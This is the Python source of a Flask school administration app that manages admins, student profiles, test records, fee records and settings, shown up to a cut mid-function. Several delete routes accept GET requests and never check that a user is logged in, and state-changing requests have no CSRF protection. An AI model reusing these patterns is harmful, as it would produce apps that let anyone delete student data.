THIS_FOLDER_G = ""
if getattr(sys, 'frozen', False):
# frozen
THIS_FOLDER_G = os.path.dirname(sys.executable)
else:
# unfrozen
THIS_FOLDER_G = os.path.dirname(os.path.realpath(__file__))
### configure CS50 Library to use SQLite database
db = SQL("sqlite:///" + THIS_FOLDER_G + "/db/system.db")
### Disable cache
@app.after_request
def add_header(r):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
### Store current session to global variable "g"
@app.before_request
def before_request():
g.systemsettings = {}
systemsettings = db.execute("SELECT * FROM systemsettings WHERE id=:id", id=1)
g.systemsettings["institutionname"] = systemsettings[0]["institutionname"]
g.systemsettings["icoURL"] = systemsettings[0]["icoURL"]
g.systemsettings["pngURL"] = systemsettings[0]["pngURL"]
g.systemsettings["jpgURL"] = systemsettings[0]["jpgURL"]
g.systemsettings["nameinheader"] = systemsettings[0]["nameinheader"]
g.systemsettings["logoinheader"] = systemsettings[0]["logoinheader"]
g.user = None
g.firstname = None
g.lastname = None
g.role = None
g.logged_in = None
if "user" in session:
g.user = session["user"]
g.username = session["username"]
g.firstname = session["firstname"]
g.lastname = session["lastname"]
g.role = session["role"]
g.logged_in = session["logged_in"]
### Root
@app.route("/")
def index():
if g.user:
return redirect(url_for("home"))
else:
return redirect(url_for("login"))
### Home
@app.route("/home")
def home():
if g.user:
numofstudents = len(db.execute("SELECT * FROM students WHERE status=:status", status="Active"))
numofadmins = len(db.execute("SELECT * FROM admins"))
return render_template("home.html", numofstudents=numofstudents, numofadmins=(numofadmins - 1))
else:
return redirect(url_for("login"))
'''
Login/Logout
'''
### Login
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "GET":
return render_template("login.html")
elif request.method == "POST":
username = request.form["username"]
password = request.form["password"]
users = db.execute("SELECT * FROM admins WHERE username=:username", username=username)
if len(users) > 0:
if users[0]["username"] == username and sha256_crypt.verify(password, users[0]["password"]) == True:
session.pop("user", None)
session.pop("username", None)
session.pop("firstname", None)
session.pop("lastname", None)
session.pop("role", None)
session.pop("logged_in", None)
session["user"] = str(users[0]["id"])
session["username"] = users[0]["username"]
session["firstname"] = users[0]["firstname"]
session["lastname"] = users[0]["lastname"]
session["role"] = users[0]["role"]
session["logged_in"] = True
return redirect(url_for("home"))
else:
return render_template("login.html", error="Invalid Username or Password.")
else:
return render_template("login.html", error="Invalid Username or Password.")
### Logout
@app.route("/logout")
def logout():
session.pop("user", None)
session.pop("username", None)
session.pop("firstname", None)
session.pop("lastname", None)
session.pop("role", None)
session.pop("logged_in", None)
return redirect(url_for("login"))
'''
Administrators
'''
### Main administrators page
@app.route("/administrators")
def administrators():
if g.user and g.role == "root":
return render_template("administrators.html")
else:
return redirect(url_for("home"))
### Get admins data via ajax to show on main administrators page
@app.route("/getadmins", methods=["GET", "POST"])
def getadmins():
if g.user and g.role == "root":
admins = db.execute("SELECT * FROM admins")
admins = sorted(admins, key=lambda k: str.lower(k["firstname"]))
for i in range(len(admins)):
if admins[i]["username"] == g.username:
admins.pop(i)
break
return jsonify(admins)
else:
return redirect(url_for("home"))
### Save admin info via ajax
@app.route("/saveadmininfo", methods=["GET", "POST"])
def saveadmininfo():
if g.user and g.role == "root":
if request.method == "POST":
id = request.values.get("id")
firstname = request.values.get("firstname")
lastname = request.values.get("lastname")
username = request.values.get("username")
password = request.values.get("password")
contact = request.values.get("contact")
role = request.values.get("role")
image = request.files["imgURL"]
admins = db.execute("SELECT * FROM admins")
for i in range(len(admins)):
if admins[i]["username"] == username and admins[i]["id"] != int(id):
return jsonify([{"status": "error", "msg": "Username already taken."}])
if image:
if allowed_file(image.filename) == True:
imagename = image.filename
imageext = imagename.split(".")[-1]
imagename = "admin_" + str(id) + "." + imageext
imgExt = db.execute("SELECT * FROM admins WHERE id=:id", id=int(id))
imgExt = imgExt[0]["imgURL"]
imgExt = imgExt.split(".")
imgExt = imgExt[-1]
try:
os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + id + "." + imgExt))
except:
pass
image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
imgURL = "../static/img/db/admins/" + imagename
db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
db.execute("UPDATE admins SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
db.execute("UPDATE admins SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
db.execute("UPDATE admins SET username=:username WHERE id=:id", username=username, id=int(id))
db.execute("UPDATE admins SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
db.execute("UPDATE admins SET role=:role WHERE id=:id", role=role, id=int(id))
if password != "":
db.execute("UPDATE admins SET password=:password WHERE id=:id", password=sha256_crypt.hash(password), id=int(id))
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Add admin info via ajax
@app.route("/addnewadmin", methods=["GET", "POST"])
def addnewadmin():
if g.user and g.role == "root":
if request.method == "POST":
firstname = request.values.get("firstname")
lastname = request.values.get("lastname")
username = request.values.get("username")
oldpassword = request.values.get("oldpassword")
password = request.values.get("password")
contact = request.values.get("contact")
role = request.values.get("role")
image = request.files["imgURL"]
admins = db.execute("SELECT * FROM admins")
if firstname == "" or lastname == "" or username == "" or password == "":
return jsonify([{"status": "error", "msg": "Incomplete Details."}])
for i in range(len(admins)):
if admins[i]["username"] == username:
return jsonify([{"status": "error", "msg": "Username already taken."}])
imgURL = "../static/img/system/default-prof-img.png"
if image:
if allowed_file(image.filename) == True:
db.execute("INSERT INTO admins (username, firstname, lastname, password, role, contact, imgURL) VALUES (:username, :firstname, :lastname, :password, :role, :contact, :imgURL)", username=username, firstname=firstname, lastname=lastname, password=sha256_crypt.hash(password), role=role, contact=contact, imgURL=imgURL)
newuser = db.execute("SELECT * FROM admins WHERE username=:username", username=username)
imagename = image.filename
imageext = imagename.split(".")[-1]
imagename = "admin_" + str(newuser[0]["id"]) + "." + imageext
image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
imgURL = "../static/img/db/admins/" + imagename
db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=newuser[0]["id"])
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
else:
db.execute("INSERT INTO admins (username, firstname, lastname, password, role, contact, imgURL) VALUES (:username, :firstname, :lastname, :password, :role, :contact, :imgURL)", username=username, firstname=firstname, lastname=lastname, password=sha256_crypt.hash(password), role=role, contact=contact, imgURL=imgURL)
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Delete admin via ajax
@app.route("/deleteadmin", methods=["GET", "POST"])
def deleteadmin():
if g.user and g.role == "root":
if request.method == "POST":
id = request.values.get("id")
admins = db.execute("SELECT * FROM admins")
for i in range(len(admins)):
if admins[i]["id"] == int(id):
firstname = admins[i]["firstname"]
lastname = admins[i]["lastname"]
imgExt = admins[i]["imgURL"]
imgExt = imgExt.split(".")
imgExt = imgExt[-1]
try:
os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + id + "." + imgExt))
except:
pass
db.execute("DELETE FROM admins WHERE id=:id", id=int(id))
return jsonify([{"status": "success", "msg": "Deleted", "firstname": firstname, "lastname": lastname}])
else:
return redirect(url_for("home"))
'''
User profile of the currently logged in user(admin)
'''
### Show currently logged in user's profile
@app.route("/userprofile", methods=["GET", "POST"])
def userprofile():
if g.user:
return render_template("userprofile.html")
else:
return redirect(url_for("home"))
### Get currently logged in user's data via ajax to view on user profile
@app.route("/getuserprofile", methods=["GET", "POST"])
def getuserprofile():
if g.user:
user = db.execute("SELECT * FROM admins where id=:id", id=int(g.user))
return jsonify(user)
else:
return redirect(url_for("home"))
### Save user profile changes via ajax
@app.route("/saveuserprofile", methods=["GET", "POST"])
def saveuserprofile():
if g.user:
if request.method == "POST":
id = request.values.get("id")
firstname = request.values.get("firstname")
lastname = request.values.get("lastname")
username = request.values.get("username")
oldpassword = request.values.get("oldpassword")
password = request.values.get("password")
confirmpassword = request.values.get("confirmpassword")
contact = request.values.get("contact")
image = request.files["imgURL"]
admins = db.execute("SELECT * FROM admins")
for i in range(len(admins)):
if admins[i]["username"] == username and admins[i]["id"] != int(id):
return jsonify([{"status": "error", "msg": "Username already taken."}])
users = db.execute("SELECT * FROM admins WHERE id=:id", id=int(g.user))
if password != "":
if password != confirmpassword:
return jsonify([{"status": "error", "msg": "Confirm new password."}])
if sha256_crypt.verify(oldpassword, users[0]["password"]) == True:
db.execute("UPDATE admins SET password=:password WHERE id=:id", password=sha256_crypt.hash(password), id=int(id))
else:
return jsonify([{"status": "error", "msg": "Old password did not match."}])
if image:
if allowed_file(image.filename) == True:
imagename = image.filename
imageext = imagename.split(".")[-1]
imagename = "admin_" + str(id) + "." + imageext
imgExt = db.execute("SELECT * FROM admins WHERE id=:id", id=int(id))
imgExt = imgExt[0]["imgURL"]
imgExt = imgExt.split(".")
imgExt = imgExt[-1]
try:
os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + id + "." + imgExt))
except:
pass
image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
imgURL = "../static/img/db/admins/" + imagename
db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
db.execute("UPDATE admins SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
db.execute("UPDATE admins SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
db.execute("UPDATE admins SET username=:username WHERE id=:id", username=username, id=int(id))
db.execute("UPDATE admins SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
users = db.execute("SELECT * FROM admins WHERE id=:id", id=int(g.user))
if len(users) > 0:
session["username"] = users[0]["username"]
session["firstname"] = users[0]["firstname"]
session["lastname"] = users[0]["lastname"]
session["role"] = users[0]["role"]
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
'''
Students
'''
### Main students page. View all currently active students
@app.route("/students")
def students():
if g.user:
students = db.execute("SELECT * FROM students WHERE status=:status", status="Active")
students = sorted(students, key=lambda k: str.lower(k["firstname"]))
return render_template("students.html", students=students)
else:
return redirect(url_for("home"))
### Main students page. View all currently inactive students
@app.route("/students/inactive")
def inactivestudents():
if g.user:
students = db.execute("SELECT * FROM students WHERE status=:status", status="Inactive")
students = sorted(students, key=lambda k: str.lower(k["firstname"]))
return render_template("students.html", students=students, inactive=True)
else:
return redirect(url_for("home"))
### View th profile of a specific student based on student ID
@app.route("/studentprofile/<id>")
def studentprofile(id):
if g.user:
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
if len(student) > 0:
if student[0]["status"] == "Inactive":
return render_template("studentprofile.html", student=student[0], inactive=True)
else:
return render_template("studentprofile.html", student=student[0])
else:
return render_template("notfound.html", msg="Student Not Found.")
else:
return redirect(url_for("home"))
### Get student data via ajax to view on student profile based on student ID
@app.route("/getstudentprofile/<id>")
def getstudentprofile(id):
if g.user:
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
if len(student) > 0:
return jsonify(student)
else:
return render_template("notfound.html", msg="Student Not Found.")
else:
return redirect(url_for("home"))
### Save student data changes via ajax based on student ID
@app.route("/savestudentinfo/<id>", methods=["GET", "POST"])
def savestudentinfo(id):
if g.user:
if request.method == "POST":
id = id
firstname = request.values.get("firstname")
lastname = request.values.get("lastname")
fathername = request.values.get("fathername")
contact = request.values.get("contact")
gender = request.values.get("gender")
dob = request.values.get("dob")
address = request.values.get("address")
class_ = request.values.get("class")
admissiondate = request.values.get("admissiondate")
monthlyfee = request.values.get("monthlyfee")
status = request.values.get("status")
image = request.files["imgURL"]
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
if firstname == "" or lastname == "" or fathername == "" or contact == "" or gender == "" or dob == "" or address == "" or class_ == "" or admissiondate == "" or monthlyfee == "" or status == "":
return jsonify([{"status": "error", "msg": "Incomplete Details."}])
if len(student) < 1:
return jsonify([{"status": "error", "msg": "Student does not exist."}])
if status != "Active" and status != "Inactive":
return jsonify([{"status": "error", "msg": "Invalid status."}])
if image:
if allowed_file(image.filename) == True:
imagename = image.filename
imageext = imagename.split(".")[-1]
imagename = "student_" + str(id) + "." + imageext
imgExt = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
imgExt = imgExt[0]["imgURL"]
imgExt = imgExt.split(".")
imgExt = imgExt[-1]
try:
os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", "student_" + id + "." + imgExt))
except:
pass
image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", imagename))
imgURL = "../static/img/db/students/" + imagename
db.execute("UPDATE students SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
db.execute("UPDATE students SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
db.execute("UPDATE students SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
db.execute("UPDATE students SET fathername=:fathername WHERE id=:id", fathername=fathername, id=int(id))
db.execute("UPDATE students SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
db.execute("UPDATE students SET gender=:gender WHERE id=:id", gender=gender, id=int(id))
db.execute("UPDATE students SET dob=:dob WHERE id=:id", dob=dob, id=int(id))
db.execute("UPDATE students SET address=:address WHERE id=:id", address=address, id=int(id))
db.execute("UPDATE students SET class=:class_ WHERE id=:id", class_=class_, id=int(id))
db.execute("UPDATE students SET admissiondate=:admissiondate WHERE id=:id", admissiondate=admissiondate, id=int(id))
db.execute("UPDATE students SET monthlyfee=:monthlyfee WHERE id=:id", monthlyfee=int(monthlyfee), id=int(id))
db.execute("UPDATE students SET status=:status WHERE id=:id", status=status, id=int(id))
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Add new student via ajax
@app.route("/addnewstudent", methods=["GET", "POST"])
def addnewstudent():
if g.user:
if request.method == "POST":
firstname = request.values.get("firstname")
lastname = request.values.get("lastname")
fathername = request.values.get("fathername")
contact = request.values.get("contact")
gender = request.values.get("gender")
dob = request.values.get("dob")
address = request.values.get("address")
class_ = request.values.get("class")
admissiondate = request.values.get("admissiondate")
monthlyfee = request.values.get("monthlyfee")
image = request.files["imgURL"]
students = db.execute("SELECT * FROM students")
if firstname == "" or lastname == "" or fathername == "" or contact == "" or gender == "" or dob == "" or address == "" or class_ == "" or admissiondate == "" or monthlyfee == "":
return jsonify([{"status": "error", "msg": "Incomplete Details."}])
elif RepresentsInt(monthlyfee) != True:
return jsonify([{"status": "error", "msg": "Incompatible Details."}])
imgURL = "../static/img/system/default-prof-img.png"
if image:
if allowed_file(image.filename) == True:
db.execute("INSERT INTO students (firstname, lastname, fathername, contact, gender, dob, address, class, admissiondate, monthlyfee, imgURL) VALUES (:firstname, :lastname, :fathername, :contact, :gender, :dob, :address, :class_, :admissiondate, :monthlyfee, :imgURL)", firstname=firstname, lastname=lastname, fathername=fathername, contact=contact, gender=gender, dob=dob, address=address, class_=class_, admissiondate=admissiondate, monthlyfee=int(monthlyfee), imgURL=imgURL)
students_ = db.execute("SELECT * FROM students")
student = None
for i in range(len(students_)):
for j in range(len(students_)):
if students_[i]["id"] >= students_[j]["id"]:
student = students_[i]
if student != None and student['firstname'] == firstname and student['lastname'] == lastname and student['fathername'] == fathername and student['gender'] == gender and student['dob'] == dob and student['address'] == address and student['class'] == class_ and student['admissiondate'] == admissiondate and student['monthlyfee'] == int(monthlyfee):
id = student['id']
imagename = image.filename
imageext = imagename.split(".")[-1]
imagename = "student_" + str(id) + "." + imageext
image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", imagename))
imgURL = "../static/img/db/students/" + imagename
db.execute("UPDATE students SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
else:
db.execute("INSERT INTO students (firstname, lastname, fathername, contact, gender, dob, address, class, admissiondate, monthlyfee, imgURL) VALUES (:firstname, :lastname, :fathername, :contact, :gender, :dob, :address, :class_, :admissiondate, :monthlyfee, :imgURL)", firstname=firstname, lastname=lastname, fathername=fathername, contact=contact, gender=gender, dob=dob, address=address, class_=class_, admissiondate=admissiondate, monthlyfee=int(monthlyfee), imgURL=imgURL)
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Delete student based on student ID
@app.route("/deletestudent/<id>", methods=["GET", "POST"])
def deletestudent(id):
id = id
students = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
imgExt = students[0]["imgURL"]
imgExt = imgExt.split(".")
imgExt = imgExt[-1]
try:
os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", "student_" + id + "." + imgExt))
except:
pass
db.execute("DELETE FROM students WHERE id=:id", id=int(id))
db.execute("DELETE FROM testrecords WHERE studentID=:studentID", studentID=int(id))
db.execute("DELETE FROM feerecords WHERE studentID=:studentID", studentID=int(id))
return redirect(url_for("students"))
'''
Test Records
'''
### Main test records page
@app.route("/testrecords")
def testrecords():
if g.user:
records = db.execute("SELECT * FROM testrecords")
return render_template("testrecords.html", records=records)
else:
return redirect(url_for("home"))
### View all test records page
@app.route("/alltestrecords")
def alltestrecords():
if g.user:
records = db.execute("SELECT * FROM testrecords")
records.reverse()
return render_template("alltestrecords.html", records=records)
else:
return redirect(url_for("home"))
### View test record of a specific student based on student ID
@app.route("/testrecord/<id>")
def fetchtestrecord(id):
if g.user:
records = db.execute("SELECT * FROM testrecords WHERE studentID=:id", id=int(id))
if len(records) < 1:
return render_template("notfound.html", msg="Record Not Found.")
else:
records.reverse()
return render_template("studenttestrecord.html", records=records)
else:
return redirect(url_for("home"))
### Add test record of a specific student based on student ID
@app.route("/addtestrecords/<i>")
def addtestrecords(i):
if g.user:
return render_template("addtestrecords.html", i=int(i))
else:
return redirect(url_for("home"))
### Add new fee record according to student ID page
@app.route("/addstudenttestrecord/<id>")
def addstudenttestrecord(id):
if g.user:
return render_template("addtestrecords.html", i=1, id=id)
else:
return redirect(url_for("home"))
### Add new test records via ajax
@app.route("/addnewtestrecord", methods=["POST"])
def addnewtestrecord():
if g.user:
if request.method == "POST":
studentID = request.values.get("studentID")
date = request.values.get("date")
subject = request.values.get("subject")
description = request.values.get("description")
totalmarks = request.values.get("totalmarks")
obtainedmarks = request.values.get("obtainedmarks")
remarks = request.values.get("remarks")
if studentID == "" or date == "" or subject == "" or totalmarks == "" or obtainedmarks == "":
return jsonify([{"status": "error", "msg": "Incomplete data."}])
elif RepresentsInt(studentID) != True or RepresentsInt(totalmarks) != True or RepresentsInt(obtainedmarks) != True:
return jsonify([{"status": "error", "msg": "Incompatible data."}])
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
if len(student) < 1:
return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
db.execute("INSERT INTO testrecords (studentID, studentName, studentFrName, date, class, subject, description, totalmarks, obtainedmarks, obtainedpercentage, remarks) VALUES (:studentID, :studentName, :studentFrName, :date, :class_, :subject, :description, :totalmarks, :obtainedmarks, :obtainedpercentage, :remarks)", studentID=int(student[0]["id"]), studentName=str(student[0]["firstname"] + " " + student[0]["lastname"]), studentFrName=student[0]["fathername"], date=date, class_=student[0]["class"], subject=subject, description=description, totalmarks=int(totalmarks), obtainedmarks=int(obtainedmarks), obtainedpercentage=int(int(obtainedmarks)/int(totalmarks)*100), remarks=remarks)
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Edit test record
@app.route("/edittestrecord/<id>")
def edittestrecord(id):
if g.user and g.role == "root":
id = id
record = db.execute("SELECT * FROM testrecords WHERE id=:id", id=int(id))
if len(record) < 1:
return render_template("notfound.html", msg="Record Not Found.")
else:
return render_template("edittestrecord.html", i=1, record=record[0])
else:
return redirect(url_for("home"))
### Update test record via ajax
@app.route("/updatetestrecord/<id>", methods=["POST"])
def updatetestrecord(id):
if g.user and g.role == "root":
if request.method == "POST":
id = id
studentID = request.values.get("studentID")
studentName = request.values.get("studentName")
studentFrName = request.values.get("studentFrName")
date = request.values.get("date")
class_ = request.values.get("class")
subject = request.values.get("subject")
description = request.values.get("description")
totalmarks = request.values.get("totalmarks")
obtainedmarks = request.values.get("obtainedmarks")
remarks = request.values.get("remarks")
if studentID == "" or studentName == "" or studentFrName == "" or date == "" or class_ == "" or subject == "" or totalmarks == "" or obtainedmarks == "":
return jsonify([{"status": "error", "msg": "Incomplete data."}])
elif RepresentsInt(studentID) != True or RepresentsInt(totalmarks) != True or RepresentsInt(obtainedmarks) != True:
return jsonify([{"status": "error", "msg": "Incompatible data."}])
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
if len(student) < 1:
return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
db.execute("UPDATE testrecords SET studentID=:studentID WHERE id=:id", studentID=studentID, id=int(id))
db.execute("UPDATE testrecords SET studentName=:studentName WHERE id=:id", studentName=studentName, id=int(id))
db.execute("UPDATE testrecords SET studentFrName=:studentFrName WHERE id=:id", studentFrName=studentFrName, id=int(id))
db.execute("UPDATE testrecords SET date=:date WHERE id=:id", date=date, id=int(id))
db.execute("UPDATE testrecords SET class=:class_ WHERE id=:id", class_=class_, id=int(id))
db.execute("UPDATE testrecords SET subject=:subject WHERE id=:id", subject=subject, id=int(id))
db.execute("UPDATE testrecords SET description=:description WHERE id=:id", description=description, id=int(id))
db.execute("UPDATE testrecords SET totalmarks=:totalmarks WHERE id=:id", totalmarks=totalmarks, id=int(id))
db.execute("UPDATE testrecords SET obtainedmarks=:obtainedmarks WHERE id=:id", obtainedmarks=obtainedmarks, id=int(id))
db.execute("UPDATE testrecords SET obtainedpercentage=:obtainedpercentage WHERE id=:id", obtainedpercentage=int(int(obtainedmarks)/int(totalmarks)*100), id=int(id))
db.execute("UPDATE testrecords SET remarks=:remarks WHERE id=:id", remarks=remarks, id=int(id))
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Delete test record based on record ID
@app.route("/deletetestrecord/<id>", methods=["GET", "POST"])
def deletetestrecord(id):
id = id
db.execute("DELETE FROM testrecords WHERE id=:id", id=int(id))
return redirect(url_for("testrecords"))
'''
Fee Records
'''
### Main fee records page
@app.route("/feerecords")
def feerecords():
if g.user:
records = db.execute("SELECT * FROM feerecords")
return render_template("feerecords.html", records=records)
else:
return redirect(url_for("home"))
### View all fee records page
@app.route("/allfeerecords")
def allfeerecords():
if g.user:
records = db.execute("SELECT * FROM feerecords")
records.reverse()
return render_template("allfeerecords.html", records=records)
else:
return redirect(url_for("home"))
### View fee record of a specific student based on student ID
@app.route("/feerecord/<id>")
def fetchfeerecord(id):
if g.user:
records = db.execute("SELECT * FROM feerecords WHERE studentID=:id", id=int(id))
if len(records) < 1:
return render_template("notfound.html", msg="Record Not Found.")
else:
records.reverse()
return render_template("studentfeerecord.html", records=records)
else:
return redirect(url_for("home"))
### Add fee record of a specific student based on student ID
@app.route("/addfeerecords/<i>")
def addfeerecords(i):
if g.user:
return render_template("addfeerecords.html", i=int(i))
else:
return redirect(url_for("home"))
### Add new fee record according to student ID page
@app.route("/addstudentfeerecord/<id>")
def addstudentfeerecord(id):
if g.user:
return render_template("addfeerecords.html", i=1, id=id)
else:
return redirect(url_for("home"))
### Add new fee records via ajax
@app.route("/addnewfeerecord", methods=["POST"])
def addnewfeerecord():
if g.user:
if request.method == "POST":
studentID = request.values.get("studentID")
date = request.values.get("date")
feefor = request.values.get("feefor")
depositedfee = request.values.get("depositedfee")
if studentID == "" or date == "" or feefor == "" or depositedfee == "":
return jsonify([{"status": "error", "msg": "Incomplete data."}])
elif RepresentsInt(studentID) != True or RepresentsInt(depositedfee) != True:
return jsonify([{"status": "error", "msg": "Incompatible data."}])
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
if len(student) < 1:
return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
lastR_ID = db.execute("INSERT INTO feerecords (studentID, studentName, studentFrName, date, feefor, depositedfee) VALUES (:studentID, :studentName, :studentFrName, :date, :feefor, :depositedfee)", studentID=int(student[0]["id"]), studentName=str(student[0]["firstname"] + " " + student[0]["lastname"]), studentFrName=student[0]["fathername"], date=date, feefor=feefor, depositedfee=int(depositedfee))
return jsonify([{"status": "success", "msg": "Changes saved.", "lastrowID": lastR_ID}])
else:
return redirect(url_for("home"))
### Download fee receipt
@app.route("/downloadfeereceipt/<id>")
def downloadfeereceipt(id):
if g.user:
id = id
feeRecord = db.execute("SELECT * FROM feerecords WHERE id=:id", id=int(id))
if len(feeRecord) < 1:
return render_template("notfound.html", msg="Record Not Found.")
else:
return render_template("downloadfeereceipt.html", msg="Download will start in a moment ...", feeRecord=feeRecord[0])
else:
return redirect(url_for("home"))
### Edit fee record
@app.route("/editfeerecord/<id>")
def editfeerecord(id):
if g.user and g.role == "root":
id = id
record = db.execute("SELECT * FROM feerecords WHERE id=:id", id=int(id))
if len(record) < 1:
return render_template("notfound.html", msg="Record Not Found.")
else:
return render_template("editfeerecord.html", i=1, record=record[0])
else:
return redirect(url_for("home"))
### Update fee record via ajax
@app.route("/updatefeerecord/<id>", methods=["POST"])
def updatefeerecord(id):
if g.user and g.role == "root":
if request.method == "POST":
id = id
studentID = request.values.get("studentID")
studentName = request.values.get("studentName")
studentFrName = request.values.get("studentFrName")
date = request.values.get("date")
feefor = request.values.get("feefor")
depositedfee = request.values.get("depositedfee")
if studentID == "" or studentName == "" or studentFrName == "" or date == "" or feefor == "" or depositedfee == "":
return jsonify([{"status": "error", "msg": "Incomplete data."}])
elif RepresentsInt(studentID) != True or RepresentsInt(depositedfee) != True:
return jsonify([{"status": "error", "msg": "Incompatible data."}])
student = db.execute("SELECT * FROM students WHERE id=:id", id=int(studentID))
if len(student) < 1:
return jsonify([{"status": "error", "msg": "No Student with entered ID."}])
db.execute("UPDATE feerecords SET studentID=:studentID WHERE id=:id", studentID=studentID, id=int(id))
db.execute("UPDATE feerecords SET studentName=:studentName WHERE id=:id", studentName=studentName, id=int(id))
db.execute("UPDATE feerecords SET studentFrName=:studentFrName WHERE id=:id", studentFrName=studentFrName, id=int(id))
db.execute("UPDATE feerecords SET date=:date WHERE id=:id", date=date, id=int(id))
db.execute("UPDATE feerecords SET feefor=:feefor WHERE id=:id", feefor=feefor, id=int(id))
db.execute("UPDATE feerecords SET depositedfee=:depositedfee WHERE id=:id", depositedfee=depositedfee, id=int(id))
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Delete fee record based on record ID
@app.route("/deletefeerecord/<id>", methods=["GET", "POST"])
def deletefeerecord(id):
id = id
db.execute("DELETE FROM feerecords WHERE id=:id", id=int(id))
return redirect(url_for("feerecords"))
'''
System Settings
'''
### System settings page
@app.route("/systemsettings")
def systemsettings():
if g.user and g.role == "root":
return render_template("systemsettings.html")
else:
return redirect(url_for("home"))
### Get system settings via ajax
@app.route("/getsystemsettings")
def getsystemsettings():
if g.user and g.role == "root":
systemsettings = db.execute("SELECT * FROM systemsettings where id=:id", id=1)
return jsonify(systemsettings)
else:
return redirect(url_for("home"))
### Save system settings changes via ajax
@app.route("/savesystemsettings", methods=["GET", "POST"])
def savesystemsettings():
if g.user and g.role == "root":
if request.method == "POST":
id = request.values.get("id")
institutionname = request.values.get("institutionname")
nameinheader = request.values.get("nameinheader")
logoinheader = request.values.get("logoinheader")
pngURL = request.files["pngURL"]
jpgURL = request.files["jpgURL"]
icoURL = request.files["icoURL"]
print(institutionname, nameinheader, logoinheader)
if institutionname == "":
return jsonify([{"status": "error", "msg": "Institution Name is Mandatory"}])
if (nameinheader != "true" and nameinheader != "false") or (logoinheader != "true" and logoinheader != "false"):
return jsonify([{"status": "error", "msg": "Incompatible Values for true/false"}])
if pngURL:
if allowed_file(pngURL.filename) == True:
imagename = pngURL.filename
imageext = imagename.split(".")[-1]
imagename = "logo." + imageext
pngURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
pngURL = "../static/img/system/" + imagename
db.execute("UPDATE systemsettings SET pngURL=:pngURL WHERE id=:id", pngURL=pngURL, id=1)
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
if jpgURL:
if allowed_file(jpgURL.filename) == True:
imagename = jpgURL.filename
imageext = imagename.split(".")[-1]
imagename = "logo." + imageext
jpgURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
jpgURL = "../static/img/system/" + imagename
db.execute("UPDATE systemsettings SET jpgURL=:jpgURL WHERE id=:id", jpgURL=jpgURL, id=1)
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
if icoURL:
if allowed_file(icoURL.filename) == True:
imagename = icoURL.filename
imageext = imagename.split(".")[-1]
imagename = "logo." + imageext
icoURL.save(os.path.join(THIS_FOLDER_G + "/static/img/system/", imagename))
icoURL = "../static/img/system/" + imagename
db.execute("UPDATE systemsettings SET icoURL=:icoURL WHERE id=:id", icoURL=icoURL, id=1)
else:
return jsonify([{"status": "error", "msg": "File extension not supported."}])
db.execute("UPDATE systemsettings SET institutionname=:institutionname WHERE id=:id", institutionname=institutionname, id=1)
db.execute("UPDATE systemsettings SET nameinheader=:nameinheader WHERE id=:id", nameinheader=nameinheader, id=1)
